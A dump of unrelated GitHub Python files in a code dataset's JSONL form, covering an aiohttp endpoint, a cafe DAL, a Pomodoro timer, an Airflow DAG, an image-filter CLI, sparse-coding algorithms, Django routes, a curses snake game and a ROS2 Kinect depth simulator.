marshmallow_sqlalchemy\nfrom aiopg.sa import create_engine\n\nimport sqlalchemy as sa\nfrom marshmallow_sqlalchemy import ModelSchema\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker, relationship, backref\n\nengine = sa.create_engine(\"postgres://127.0.0.1/test\")\nsession = scoped_session(sessionmaker(bind=engine))\nBase = declarative_base()\n\nclass Author(Base):\n __tablename__ = \"authors\"\n id = 
sa.Column(sa.Integer, primary_key=True)\n    name = sa.Column(sa.String)\n\n    def __repr__(self):\n        return \"\".format(self=self)\n\n\nclass AuthorSchema(ModelSchema):\n    class Meta:\n        model = Author\n        transient = True\n\nBase.metadata.create_all(engine)\nauthor = Author(name=\"Chuck Paluhniuk\")\nsession.add(author)\nsession.commit()\nauthor = Author(name=\"Adolf Hitler\")\nsession.add(author)\nsession.commit()\n\nimport ipdb\nipdb.set_trace()\n\nclass Test(Endpoint):\n    model = Author\n    schema = AuthorSchema()\n    path = '/test'\n\n\n\napp = web.Application()\nasync def on_startup(app):\n    db = await create_engine(database='test')\n    test = Test(db)\n    test.setup_routes(app.router)\n\n# import ipdb\n# ipdb.set_trace()\n# aiohttp_autoreload.start()\napp.on_startup.append(on_startup)\nweb.run_app(app)\n\n","repo_name":"kotenev/aiorf","sub_path":"aiorf/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7965779126","text":"from typing import List\n\nfrom DAL.Manager import Manager\nfrom DTO.ReceiptDetails import ReceiptDetails\n\n\nclass ReceiptDetailsDAL(Manager):\n    def __init__(self):\n        super().__init__(\"receipt_details\", [\n            \"RECEIPT_ID\",\n            \"INGREDIENT_ID\",\n            \"QUANTITY\",\n            \"SUPPLIER_ID\"\n        ])\n\n    def convertToReceiptDetails(self, data: List[List[object]]) -> List[ReceiptDetails]:\n        return self.convert(data, lambda row: ReceiptDetails(\n            row['RECEIPT_ID'],\n            row['INGREDIENT_ID'],\n            row['QUANTITY'],\n            row['SUPPLIER_ID']\n        ))\n\n    def addReceiptDetails(self, receiptDetails: ReceiptDetails) -> int:\n        try:\n            return self.create(\n                receiptDetails.getReceiptID(),\n                receiptDetails.getIngredientID(),\n                receiptDetails.getQuantity(),\n                receiptDetails.getSupplierID()\n            )  # a receiptDetails row is created with deleted = 0 by default\n        except Exception as e:\n            print(f\"Error occurred in ReceiptDetailsDAL.addReceiptDetails(): {e}\")\n            return 0\n\n    def searchReceiptDetails(self, *conditions: str) -> List[ReceiptDetails]:\n        try:\n            return self.convertToReceiptDetails(self.read(*conditions))\n        except Exception as e:\n            print(f\"Error occurred in ReceiptDetailsDAL.searchReceiptDetails(): {e}\")\n            return []\n","repo_name":"quangduy201/cafe-application","sub_path":"cafe_application/src/DAL/ReceiptDetailsDAL.py","file_name":"ReceiptDetailsDAL.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70067007414","text":"import time\nimport math\nfrom tkinter import *\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nreps = 0\ntimer = None\n# ---------------------------- TIMER RESET ------------------------------- #\n\n\ndef reset_timer():\n    if timer is not None:\n        window.after_cancel(timer)\n    canvas.itemconfig(timer_text, text=f\"00:00\")\n    timer_label.config(text=\"Timer\", fg=GREEN)\n    check_label.config(text=\"\")\n    global reps\n    reps = 0\n\n# ---------------------------- TIMER MECHANISM ------------------------------- #\n\n\ndef count_down_trigger():\n    global reps\n    reps += 1\n    work_sec = WORK_MIN * 60\n    short_break_sec = SHORT_BREAK_MIN * 60\n    long_break_sec = LONG_BREAK_MIN * 60\n\n    if reps % 8 == 0:\n        timer_label.config(text=\"Break\", fg=RED)\n        count_down(long_break_sec)\n    elif reps % 2 == 0:\n        
timer_label.config(text=\"Break\", fg=PINK)\n count_down(short_break_sec)\n else:\n timer_label.config(text=\"Work\", fg=GREEN)\n count_down(work_sec)\n\n\n\n\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #\n\n\ndef count_down(count):\n\n minutes = math.floor(count / 60)\n seconds = count % 60\n canvas.itemconfig(timer_text, text=f\"{minutes:02}:{seconds:02}\")\n if count > 0:\n global timer\n timer = window.after(1000, count_down, count - 1)\n else:\n count_down_trigger()\n marks = \"\"\n work_sessions = math.floor(reps/2)\n for _ in range(work_sessions):\n marks += \"✔\"\n check_label.config(text=marks)\n\n# ---------------------------- UI SETUP ------------------------------- #\nwindow = Tk()\nwindow.title(\"Pomodoro\")\nwindow.config(padx=100, pady=50, bg=YELLOW)\n\ntimer_label = Label(fg=GREEN, bg=YELLOW, text=\"Timer\", font=(FONT_NAME, 35, \"bold\"))\ntimer_label.grid(row=0, column=1)\ncanvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)\ntomato_img = PhotoImage(file=\"tomato.png\")\ncanvas.create_image(\n 100,\n 112,\n image=tomato_img\n)\ntimer_text = canvas.create_text(100, 130, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\ncanvas.grid(row=1, column=1)\n\nstart_button = Button(text=\"Start\", highlightthickness=0, command=count_down_trigger)\nstart_button.grid(column=0, row=2)\nreset_button = Button(text=\"Reset\", highlightthickness=0, command=reset_timer)\nreset_button.grid(column=2, row=2)\ncheck_label = Label(fg=GREEN, bg=YELLOW, font=(FONT_NAME, 20, \"bold\"))\ncheck_label.grid(column=1, row=3)\nwindow.mainloop()","repo_name":"AndreAppolariFilho/100_days_of_python","sub_path":"day_28_pomodora/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20812277453","text":"# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport airflow\nfrom datetime import datetime, timedelta\nfrom acme.operators.file_operators import FileToPredictableLocationOperator\nfrom acme.operators.file_operators import PredictableLocationToFinalLocationOperator\n\n\nseven_days_ago = datetime.combine(\n datetime.today() - timedelta(7),\n datetime.min.time())\n\nargs = {\n 'owner': 'airflow',\n 'start_date': seven_days_ago,\n 'provide_context': True\n}\n\ndag = airflow.DAG(\n 'file_ingest',\n schedule_interval=\"@daily\",\n dagrun_timeout=timedelta(minutes=60),\n default_args=args,\n max_active_runs=1)\n\npick_up_file = FileToPredictableLocationOperator(\n task_id='pick_up_file',\n src_conn_id='fs_source_system',\n dst_conn_id='fs_archive',\n file_mask=\"some_file_pattern_{{ ds_nodash }}\",\n dag=dag)\n\nload_file = PredictableLocationToFinalLocationOperator(\n task_id='load_file',\n src_conn_id='fs_archive',\n dst_conn_id='fs_target',\n src_task_id='pick_up_file',\n dag=dag)\n\npick_up_file >> load_file\n\n\nif __name__ == \"__main__\":\n 
dag.cli()\n","repo_name":"gtoonstra/etl-with-airflow","sub_path":"examples/file-ingest/file_ingest.py","file_name":"file_ingest.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":1235,"dataset":"github-code","pt":"21"} +{"seq_id":"36927804002","text":"\"\"\"Monks challenge\"\"\"\nimport argparse\nimport logging\nimport sys\nimport uuid\nfrom pathlib import Path\n\nfrom PIL import Image\n\n\ndef im_has_alpha(img_arr):\n \"\"\"\n returns True for Image with alpha channel\n \"\"\"\n channel = img_arr.info.get(\"transparency\")\n return channel is not None\n\n\ndef overlay(i_overlay, output):\n \"\"\"\n overlay a given image on top of the source.\n \"\"\"\n try:\n overlay_image = Image.open(i_overlay)\n if not im_has_alpha(overlay_image):\n return None, \"the overlay image must be transparent . RGBA mode\"\n print(\"Overlaying this beautiful image with this amazing png\")\n output.paste(overlay_image.convert(\"RGBA\"),\n mask=overlay_image.convert(\"RGBA\"))\n overlay_image.close()\n except FileNotFoundError as file_error:\n print(\"I didn't find the image, are you sure is the right place? \")\n return None, str(file_error)\n except TypeError as type_error:\n print('Did you send an image input and a overlay image type?')\n return None, str(type_error)\n except OSError as os_error:\n print('Image format error')\n return None, str(os_error)\n except AttributeError as attribute_error:\n print('Did yo send two images?')\n return None, str(attribute_error)\n return output, None\n\n\ndef rotate(rotation, image):\n \"\"\"\n rotate N degrees.\n \"\"\"\n try:\n output = image.rotate(rotation)\n print(\"Changing to black and white\")\n except FileNotFoundError as file_error:\n print(\"I didn't find the image, are you sure is the right place? \")\n return None, str(file_error)\n except TypeError as type_error:\n print('Did you send an image type and a rotation int?')\n return None, str(type_error)\n except AttributeError as attribute_error:\n print('Did you send an image and a rotation int?')\n return None, str(attribute_error)\n return output, None\n\n\ndef gray_scale(image):\n \"\"\"\n convert the given image to black and white.\n \"\"\"\n try:\n output = image.convert('LA')\n print(\"Changing to black and white\")\n except FileNotFoundError as file_error:\n print(\"I didn't find the image, are you sure is the right place? 
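# --- Added sketch (assumption, not the actual acme implementation): the two operators used in the
# --- DAG above come from the repo's own acme package, which is not part of this record. A custom
# --- Airflow operator of that general shape would minimally look like this:
from airflow.models import BaseOperator

class FileToPredictableLocationSketch(BaseOperator):
    def __init__(self, src_conn_id, dst_conn_id, file_mask, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.src_conn_id = src_conn_id
        self.dst_conn_id = dst_conn_id
        self.file_mask = file_mask

    def execute(self, context):
        # resolve both filesystem connections, glob for file_mask under the source
        # path, copy matches to a date-partitioned archive path, and return that path
        raise NotImplementedError("illustrative sketch only")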
\" + str(file_error))\n return None, str(file_error)\n except TypeError as type_error:\n print('Did you send an image to gray scale it?')\n return None, str(type_error)\n except OSError as os_error:\n print(\"I do not see a file here\" + str(os_error))\n return None, str(os_error)\n return output, None\n\n\ndef monks_filter(parser, options): # pylint: disable=too-many-branches\n \"\"\"\n Case arguments\n \"\"\"\n image = Image.new(mode=\"RGBA\", size=(0, 0))\n try:\n args = parser.parse_args(options)\n if args.input is None:\n return \"Missing image input\"\n original = Image.open(args.input)\n image = original.copy()\n original.close()\n error = None\n for option in options:\n if image is None:\n print(\"Something went wrong\")\n logging.exception(error)\n if option in \"-f\" or option in \"--file\":\n continue\n if option in \"-r\" or option in \"--rotate\":\n image, error = rotate(args.num, image)\n elif option in \"-o\" or option in \"--overlay\":\n image, error = overlay(args.filename, image)\n elif option in \"-g\" or option in \"--gray_scale\":\n image, error = gray_scale(image)\n elif option in \"-n\" or option in \"--name\" or option in \"-e\" or option in \"--extension\":\n continue\n elif isinstance(option, str) and args.name is not None or args.type \\\n is not None or args.num is not None:\n continue\n monks_filter_result = set_output(args, image)\n except ValueError as value_error:\n logging.error(str(value_error))\n monks_filter_result = \"I don't manage this kind of extension, \" \\\n \"you can send me jpg/png files if you want\"\n image.close()\n except AttributeError as attribute_error:\n logging.error(str(attribute_error))\n monks_filter_result = \"Missing parameters\"\n image.close()\n except FileNotFoundError as file_not_found:\n logging.error(str(file_not_found))\n monks_filter_result = \"I didn't find your file, are you sure you put the wright path?\"\n image.close()\n except BaseException as exception: # pylint: disable=broad-except\n logging.error(str(exception))\n monks_filter_result = \"Missing argument!\"\n image.close()\n return monks_filter_result\n\n\ndef set_output(arguments, image):\n \"\"\"\n Setting name image output and saving file\n :param arguments: parser\n :param image: image to save\n :return:\n \"\"\"\n name = str(uuid.uuid4())\n output_type = \"jpg\"\n directory = \"/tmp/images/\"\n if arguments.name is not None and isinstance(arguments.name, str):\n name = arguments.name\n if arguments.type is not None and \"jpg\" in arguments.type or \"png\" in arguments.type:\n output_type = arguments.type\n if arguments.directory is not None and isinstance(arguments.directory, str):\n directory = arguments.directory\n Path(directory).mkdir(parents=True, exist_ok=True)\n image.convert('RGB').save(directory + name + \".\" + output_type)\n image.close()\n return 'OUTPUT:' + directory + name + \".\" + output_type\n\n\ndef create_parser():\n \"\"\"\n Creates the parser with the options for the user\n :return: Parser object\n \"\"\"\n parser_args = argparse.ArgumentParser(description='Process images according to the '\n 'selected filters')\n parser_args.add_argument('-f', '--file', action='store', dest='input',\n help='file to change')\n parser_args.add_argument(\"-r\", \"--rotate\", action='store', type=int, dest=\"num\",\n help=\"rotate an image\")\n parser_args.add_argument(\"-o\", \"--overlay\", action='store', dest=\"filename\",\n help=\"overlying the input image with an a transparent png image\")\n parser_args.add_argument(\"-g\", \"--gray_scale\", 
dest=\"grayscale\", action='store_true',\n help=\"changing to black and white.\")\n parser_args.add_argument(\"-e\", \"--extension\", dest=\"type\", action='store',\n help=\"choose your type output. It could be png or jpg\")\n parser_args.add_argument(\"-n\", \"--name_output\", dest=\"name\", action='store',\n help=\"choose your name output image. \"\n \"If you don't is going to be an uuid4 name\")\n parser_args.add_argument(\"-d\", \"--directory\", dest=\"directory\", action='store',\n help=\"choose where do you want to send the image. \"\n \"If you don't is going to be in /tmp/images/.\"\n \"Please send it with the / at the end\")\n return parser_args\n\n\nif __name__ == '__main__':\n print(\"Let see what we're going to do\")\n parser_arguments = create_parser()\n opts = sys.argv[1:]\n result = monks_filter(parser_arguments, opts)\n print(result)\n","repo_name":"julietavuan/monks-photo-filter","sub_path":"monks_filter.py","file_name":"monks_filter.py","file_ext":"py","file_size_in_byte":7325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1030751990","text":"## Importations\nimport numpy as np\nimport math\nimport cmath\n\n## Constantes\nD2 = np.array([[1,1,2,5,0,0,3,-2,1,2,2,2],[0,-1,-1,1,0,0,5,0,2,2,7,-1],[1,1,1,5,1,2,2,1,1,1,1,5],[1,5,2,2,5,0,-4,5,1,5,0,0],[0,2,2,1,1,0,0,0,0,4,-1,-2],[-1,2,2,2,-2,-3,-4,1,1,1,1,0]])\nx1 = np.array([[4/3-math.sqrt(2)/2],[4/3+math.sqrt(2)/2],[2/3]])\nx2=np.array([[-10],[-10],[1],[21],[0],[9]])\neps=1e-6\nk_max=4000\n\n## Fonctions\n\n# Fonction colonne\n# Renvoie la ieme colonne dune matrice\ndef colonne(D,i):\n i = i-1 # Les tableaux commencent a 0 en python\n taille = np.shape(D)\n M = taille[0] # Nombre de lignes de la matrice\n Di = np.zeros((M,1))\n for k in range (0,M):\n Di[k] = D[k,i]\n return Di\n\n# Fonction choix_mk\n# Renvoie la position de l'atome cherche\ndef choix_mk(D,Rk):\n taille = np.shape(D)\n M = taille[0] # Nombre de lignes de la matrice\n N = taille[1] # Nombre de colonnes de la matrice\n X = np.zeros((N,1))\n for j in range(0,N):\n col = colonne(D,j)\n colT = col.T\n X[j] = abs(np.dot(colT,Rk))/np.linalg.norm(col)\n print(X)\n for j in range(0,N):\n if (np.amax(X) == X[j]):\n mk = j\n return mk\n\n# Fonction mp\n# Algorithme du matching pursuit\ndef mp(D,kmax,eps,x0):\n taille = np.shape(D)\n M = taille[0] # Nombre de lignes de la matrice\n N = taille[1] # Nombre de colonnes de la matrice\n alpha = np.zeros((N,1))\n Rk = x0\n P=[]\n x = 0\n k = 0\n while (k < kmax) & (np.linalg.norm(Rk) > eps):\n mk = choix_mk(D,Rk)\n P = [P,mk]\n print('Les atomes selectionnes : ')\n print(P)\n a = np.dot(Rk.T,colonne(D,mk))\n b = a / (np.linalg.norm(colonne(D,mk))**2)\n c = b * colonne(D,mk)\n x = x + c\n print('x = ')\n print(x)\n alpha[mk] = alpha[mk] + b\n Rk = Rk - c\n print('Norme de Rk = ')\n print(np.linalg.norm(Rk))\n k = k+1\n niter = k\n residu_final = np.linalg.norm(Rk)\n print('x=')\n print(x)\n print(\"Nombre d'iterations :\")\n print(niter)\n print('Residu final = ')\n print(residu_final)\n print('La reprssentation parcimonieuse alpha = ')\n print(alpha)\n\n# Fonction ajout_colonne_fin\n# Ajoute la ligne Di a la fin de la matrice D\ndef ajout_colonne_fin(D,Di):\n taille = np.shape(D)\n M = taille[0] # Nombre de lignes de la matrice\n N = taille[1] # Nombre de colonnes de la matrice\n DD = np.zeros((M,N+1))\n for i in range(0,M):\n for j in range (0,N):\n DD[i,j] = D[i,j]\n for k in range(0,M):\n DD[k,N] = Di[k]\n return DD\n\n\n# Fonction omp\n# Algorithme de 
l'othogonal matching pursuit\ndef omp(D,kmax,eps,x):\n taille = np.shape(D)\n M = taille[0] # Nombre de lignes de la matrice\n N = taille[1] # Nombre de colonnes de la matrice\n alpha=np.zeros((N,1))\n Rk = x\n P = []\n Dk = D\n k = 0\n while (k < kmax) & (np.linalg.norm(Rk) > eps):\n mk = choix_mk(D,Rk)\n P = [P,mk]\n Dk = ajout_colonne_fin(Dk,colonne(Dk,mk))\n zk = np.dot(np.linalg.pinv(Dk),x)\n print('zk=')\n print(zk)\n Rk = Rk - np.dot(Dk,zk)\n k = k+1\n niter = k\n residu_final = np.linalg.norm(Rk)\n alpha = zk\n print('x = ')\n print(x)\n print(\"Nombre d'iterations = \")\n print(niter)\n print('residu final = ')\n print(residu_final)\n print('La representation parcimonieuse alpha = ')\n print(alpha)\n\n## Affichage\nprint(omp(D2, k_max, eps, x2))","repo_name":"labatvalen/compressiveSensingIntroduction","sub_path":"cs_TD2.py","file_name":"cs_TD2.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73779193332","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.MarketPlace, name='marketplace'),\n path('/', views.VendorDetail, name='vendordetail'),\n\n # Add To Cart\n path('add_to_cart//', views.AddToCart, name='addtocart'),\n # Decrease Cart\n path('decrease_cart//', views.DecreaseCart, name='decreasecart'),\n #Delete Cart Item\n path('delete_cart//', views.DeleteCart, name='deletecart'),\n]","repo_name":"Asoliudeen1/foodOnline","sub_path":"marketplace/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10859686507","text":"# -*- coding: utf-8 -*-\n\nimport curses\nimport time\nfrom random import randint\n\n\n\ndirections = [curses.KEY_RIGHT, curses.KEY_LEFT, curses.KEY_UP, curses.KEY_DOWN]\n\n\nfield_dictionary = {-1: '/',\n\t\t\t\t\t0: ' ',\n\t\t\t\t\t1: '#',\n\t\t\t\t\t2: 'o',\n\t\t\t\t\t3: '0',\n\t\t\t\t\t4: 'w'}\n\n\nclass Field:\n\tdef __init__(self, height, width, snake):\n\t\tself.height = height\n\t\tself.width = width\n\t\tself.cells = [[0 for i in range(self.width+2)] for j in range(self.height+2)]\n\n\t\t#setting border\n\t\tfor j in range(self.height+2):\n\t\t\tself.cells[j][0] = -1\n\t\t\tself.cells[j][self.width+1] = -1\n\t\tfor i in range(1, self.width+1):\n\t\t\tself.cells[0][i] = -1\n\t\t\tself.cells[self.height+1][i] = -1\n\t\t\n\t\tself.food_gen(snake)\n\t\t\n\t\t\t \n\tdef clear_field(self):\n\t\tfor j in range(1, self.height+1):\n\t\t\tfor i in range(1, self.width+1):\n\t\t\t\tself.cells[j][i] = 0\t\t\n\t\treturn\n\n\n\tdef set_field(self, snake):\n\t\t# Setting field\n\t\tself.clear_field()\n\n\t\t#setting food\n\t\tself.cells[self.food[0]][self.food[1]] = 4\n\n\t\t# Setting body\n\t\tfor i in snake.body[1:]:\n\t\t\tif i in snake.eaten_food:\n\t\t\t\tself.cells[i[0]][i[1]] = 3 \n\t\t\telse:\n\t\t\t\tself.cells[i[0]][i[1]] = 2 \n\n\t\t# Setting head\n\t\tself.cells[snake.body[0][0]][snake.body[0][1]] = 1\n\n\n\tdef render(self, screen, snake, score):\n\t\t\n\t\tself.set_field(snake)\n\t\tscreen.clear()\n\t\tfor j in range(0, self.height+2):\n\t\t\tfor i in range(0, self.width+2):\n\t\t\t\tscreen.addstr(j, i, field_dictionary[self.cells[j][i]])\n\t\tscreen.addstr(24, 2, 'Your score: ' + str(score))\n\n\n\tdef food_gen(self, snake):\n\t\ta = [randint(1, self.height), randint(1, self.width)]\n\t\t#checking if generated food hit the body\n\t\twhile a in snake.body:\n\t\t\ta = [randint(1, 
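# --- Added usage note (illustrative) for the compressive-sensing record above: the script only
# --- runs omp() at the end; plain matching pursuit can be run on the same data with
# ---     mp(D2, k_max, eps, x2)
# --- Each MP step picks the atom d maximizing |d'r| / ||d||, then updates
# ---     x <- x + (d'r / ||d||^2) d    and    r <- r - (d'r / ||d||^2) d,
# --- whereas OMP re-fits all selected atoms with a pseudo-inverse at every step.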
self.height), randint(1, self.width)]\n\t\tself.food = a\n\n\nclass Snake:\n\tdef __init__(self, y, x, direction):\n\t\tself.body = [[y, x], [y, x-1], [y, x-2]]\n\t\tself.direction = direction\n\t\tself.eaten_food = []\n\n\tdef is_alive(self, field):\n\t\t#checking if snake hit the wall\n\t\tif (self.body[0][0] == 0) or (self.body[0][0] == field.height+1) or (self.body[0][1] == 0) or (self.body[0][1] == field.width+1):\n\t\t\treturn False\n\t\t#checking if snake hit itself\n\t\tif (self.body[0] in self.body[1:]):\n\t\t\treturn False\n\t\treturn True\n\n\n\tdef set_direction(self, key):\n\t\tif key == curses.KEY_LEFT and self.direction == curses.KEY_RIGHT:\n\t\t\treturn\n\t\tif key == curses.KEY_RIGHT and self.direction == curses.KEY_LEFT:\n\t\t\treturn\n\t\tif key == curses.KEY_UP and self.direction == curses.KEY_DOWN:\n\t\t\treturn\n\t\tif key == curses.KEY_DOWN and self.direction == curses.KEY_UP:\n\t\t\treturn \n\t\tself.direction = key\n\t\n\tdef move(self, field):\n\t\tdy = 0\n\t\tdx = 0\n\t\tif (self.direction == curses.KEY_UP):\n\t\t\tdy = -1\n\t\telif (self.direction == curses.KEY_DOWN):\n\t\t\tdy = 1\n\t\telif (self.direction == curses.KEY_LEFT):\n\t\t\tdx = -1\n\t\telif (self.direction == curses.KEY_RIGHT):\n\t\t\tdx = 1\n\t\telse:\n\t\t\treturn\n\n\t\ty = self.body[0][0] + dy\n\t\tx = self.body[0][1] + dx\n\n\t\t#checking if snake have just eaten food\n\t\tif [y, x] == field.food:\n\t\t\tself.eaten_food.append([y, x])\n\t\t\tfield.food_gen(self)\n\n\t\tself.body.insert(0, [y, x])\n\t\tself.body.pop()\n\n\t\t#checking if the length of the body should increase\n\t\tfor i in self.eaten_food:\n\t\t\tif i not in self.body:\n\t\t\t\tself.eaten_food.remove(i)\n\t\t\t\tself.body.append(i)\n\t\t\t\t# break # can be uncomment if snake will start lagging\n\t\t\t\n\ndef if_inc_score(snake):\n\treturn True if (len(snake.eaten_food) != 0) and (snake.eaten_food[0] == snake.body[0]) else False\n\t\t\n'''\ndef main(screen):\n\n\tscreen.timeout(1)\n\n\tsnake = Snake(5, 5, curses.KEY_RIGHT)\n\tfield = Field(20, 20, snake)\n\tsnake_is_alive = True\n\tscore = 0\n\n\twhile snake_is_alive:\n\t\tkey = screen.getch()\n\n\t\tif key in directions:\n\t\t\tsnake.set_direction(key)\n\t\t\n\t\tsnake.move(field)\n\n\t\tif if_inc_score(snake):\n\t\t\tscore +=1\n\t\t\t\n\t\tfield.render(screen, snake, score)\n\n\t\tif not(snake.is_alive(field)):\n\t\t\tsnake_is_alive = False\n\t\t\n\t\ttime.sleep(.4)\n\telse:\n\t\tscreen.timeout(-1)\n\t\tscreen.addstr(23, 2, 'Oops, you died. 
Press End to exit the game')\n\t\twhile (screen.getch() != curses.KEY_END):\n\t\t\tpass\n\t\t\n\nif __name__ == \"__main__\":\n\tcurses.wrapper(main)\n'''\n","repo_name":"galtshifter/TeamDev","sub_path":"snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18522920673","text":"#!/usr/bin/env python3\n \nimport rclpy, cv2, numpy as np\n\nfrom rclpy.node import Node\n\nfrom geometry_msgs.msg import Pose\nfrom nav_msgs.msg import OccupancyGrid\nfrom sensor_msgs.msg import Image\nfrom tf_transformations import euler_from_quaternion\nfrom cv_bridge import CvBridge\n\ntry: # for ROS2 run and launch compatibility \n from .utils import CoordinateConverter\n from .rangefinder import build_pixel_rangefinder\n\nexcept ImportError: # for python3 run compatibility\n from utils import CoordinateConverter\n from rangefinder import build_pixel_rangefinder\n\n\nclass KinectSimulator(Node):\n\n def __init__(self):\n super().__init__('kinect_simulator')\n self.variable_init()\n self.connection_init()\n \n\n def variable_init(self):\n self.kinect_height = 0.3 # [m]\n self.wall_height = 0.5 # [m]\n self.max_depth = 10.0 # [m]\n self.hfov = 57*np.pi/180.0 # [rad] (57 [degrees])\n self.vfov = 43*np.pi/180.0 # [rad] (43 [degrees])\n self.view_depth = 4.0 # [m]\n self.min_valid_distance = 0.45 # [m]\n \n self.depth_img_width = 640 # [pix]\n self.depth_img_height = 480 # [pix]\n self.map_resolution = 0.01 # [m/pix]\n\n self.n_h_scans = 50\n self.n_v_scans = int((self.depth_img_height * self.n_h_scans) / self.depth_img_width)\n self.view_depth_pix = self.view_depth / self.map_resolution # [pix]\n self.h_beam_angles = np.linspace(self.hfov/2.0, -self.hfov/2.0, self.n_h_scans)\n self.v_beam_angles = np.linspace(self.vfov/2.0, -self.vfov/2.0, self.n_v_scans)\n\n self.converter = None\n self.mapimg = np.array([])\n self.cv_bridge = CvBridge()\n \n\n def connection_init(self):\n self.pub_depth = self.create_publisher(Image, 'camera/depth/image_raw', 10)\n\n self.sub_map = self.create_subscription(OccupancyGrid, 'map', self.set_map, 10)\n self.sub_real_pose = self.create_subscription(Pose, '/real_pose', self.new_pose, 10)\n \n\n def new_pose(self, pose):\n if len(self.mapimg) == 0:\n return None\n\n depth_image = self.max_depth * np.ones((self.n_v_scans, self.n_h_scans), dtype = np.float32)\n x, y = self.converter.metric2pixel(pose.position.x, pose.position.y)\n \n if y < 0 or self.mapimg.shape[0] <= y or x < 0 or self.mapimg.shape[1] <= x:\n depth_image = cv2.resize(depth_image, (self.depth_img_width, self.depth_img_height))\n msg = self.cv_bridge.cv2_to_imgmsg(depth_image)\n self.pub_depth.publish(msg)\n return None\n \n quat = (pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w)\n roll, pitch, yaw = euler_from_quaternion(quat)\n\n robot_pose = (x, y, yaw)\n pixel_lidar, distance_sensor = build_pixel_rangefinder(self.mapimg,\n robot_pose,\n self.hfov,\n self.n_h_scans,\n self.view_depth_pix)\n\n distance_sensor = self.map_resolution * np.array(distance_sensor) # [m]\n distance_sensor = distance_sensor[::-1] # reverse: from left to right\n \n for c, d in enumerate(distance_sensor):\n d = d*np.cos(self.h_beam_angles[c]) # project beam into the robot plane\n\n ceiling_angle = np.arctan2(self.wall_height - self.kinect_height, d)\n ceiling_limit_index = -1\n \n if ceiling_angle < self.vfov/2.0:\n ceiling_indices = np.where(self.v_beam_angles > 
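# --- Added worked example (illustrative numbers) for the depth geometry in the kinect record above:
# --- with kinect_height = 0.3 m, wall_height = 0.5 m and a wall at projected distance d = 2.0 m,
# ---     ground_angle  = atan2(0.3, 2.0)       ~ 8.5 deg -> beams below -8.5 deg hit the floor,
# ---     ceiling_angle = atan2(0.5 - 0.3, 2.0) ~ 5.7 deg -> beams above +5.7 deg see past the wall;
# --- floor pixels get depth 0.3 / sin(|angle|), past-the-wall pixels get max_depth.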
ceiling_angle)[0]\n depth_image[ceiling_indices,c] = self.max_depth\n ceiling_limit_index = ceiling_indices.max()\n\n ground_angle = np.arctan2(self.kinect_height, d)\n ground_limit_index = self.n_v_scans\n \n if ground_angle < self.vfov/2.0:\n ground_indices = np.where(self.v_beam_angles < -ground_angle)[0]\n for i in ground_indices:\n ground_d = self.kinect_height / np.sin(abs(self.v_beam_angles[i]))\n depth_image[i,c] = ground_d if ground_d >= self.min_valid_distance else float('nan')\n ground_limit_index = ground_indices.min()\n\n if ceiling_limit_index < 0:\n depth_image[0:ground_limit_index,c] = d if d >= self.min_valid_distance else float('nan')\n \n else:\n depth_image[ceiling_limit_index+1:ground_limit_index,c] = d if d >= self.min_valid_distance else float('nan')\n \n depth_image = cv2.resize(depth_image, (self.depth_img_width, self.depth_img_height))\n\n msg = self.cv_bridge.cv2_to_imgmsg(depth_image) #, encoding = '32FC1')\n self.pub_depth.publish(msg)\n\n def set_map(self, occupancy_grid):\n width = occupancy_grid.info.width\n height = occupancy_grid.info.height\n self.map_resolution = occupancy_grid.info.resolution\n self.mapimg = 100 - np.array(occupancy_grid.data).reshape((height, width))\n self.converter = CoordinateConverter(0.0, self.mapimg.shape[0] * self.map_resolution, self.map_resolution)\n self.view_depth_pix = self.view_depth / self.map_resolution # [pix]\n\n\ndef main(args=None):\n rclpy.init(args=args)\n kinect_simulator = KinectSimulator()\n rclpy.spin(kinect_simulator)\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"MonkyDCristian/very_simple_robot_simulator2","sub_path":"very_simple_robot_simulator2/kinect_simulator.py","file_name":"kinect_simulator.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13011336800","text":"import streamlit\nimport requests\nimport json\n\ndef run():\n streamlit.title(\"Loan 